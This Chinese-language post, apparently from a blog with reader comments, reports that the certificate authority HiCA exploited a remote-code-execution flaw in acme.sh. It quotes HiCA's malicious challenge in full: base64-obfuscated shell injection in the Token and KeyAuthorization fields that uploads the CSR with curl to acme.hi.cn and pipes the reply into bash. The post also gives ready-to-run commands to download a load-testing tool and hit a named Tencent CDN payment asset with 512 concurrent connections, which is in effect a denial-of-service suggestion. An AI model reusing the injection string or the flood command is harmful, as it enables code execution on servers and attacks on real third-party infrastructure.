共计 1211 个字符,预计需要花费 4 分钟才能阅读完成。
acme.sh 存在 RCE 漏洞,已经被国产 HiCA 利用 https://github.com/acmesh-official/acme.sh/issues/4659{ Type: http-01 URL: ../pki-validation Status: pending Token: dd#acme.hi.cn/acme/v2/precheck-http/123456/654321#http-01#/tmp/$(curl`IFS=^;cmd=base64^-d;$cmd<<<IA==`-sF`IFS=^;cmd=base64^-d;$cmd<<<IA==`[email protected]$csr`IFS=^;cmd=base64^-d;$cmd<<<IA==`https$(IFS=^;cmd=base64^-d;$cmd<<<Oi8v)acme.hi.cn/acme/csr/http/123456/654321?o=$_w|bash)# KeyAuthorization: dd#acme.hi.cn/acme/v2/precheck-http/123456/654321#http-01#/tmp/$(curl`IFS=^;cmd=base64^-d;$cmd<<<IA==`-sF`IFS=^;cmd=base64^-d;$cmd<<<IA==`[email protected]$csr`IFS=^;cmd=base64^-d;$cmd<<<IA==`https$(IFS=^;cmd=base64^-d;$cmd<<<Oi8v)acme.hi.cn/acme/csr/http/123456/654321?o=$_w|bash)#.GfCBN3dYnfNB-Hj1nBYek89o9ohtt9K59uacS13wigw} 相关讨论:https://www.v2ex.com/t/947389https://twitter.com/mholt6 关于 HiCA:https://www.v2ex.com/t/868344 官网和 acme.hi.cn 用的阿里云 WAF(已关闭),支付链接是腾讯云 CDN:wget https://github.com/maintell/webBenchmark/releases/download/0.6/webBenchmark_linux_x64chmod 755 webBenchmark_linux_x64./webBenchmark_linux_x64 -c 512 -s https://tencentcloud.accelerate.pki.plus/assets/wasm/wasm.wasm Caddy 2023-06-09 20:17 2 国产 CA 又立功了? abc.xyz 2023-06-09 20:28 3acme.sh 最近手动命令,现在默认好像是 ZeroSSL?HiCA 是什么鬼,没听过说。。。
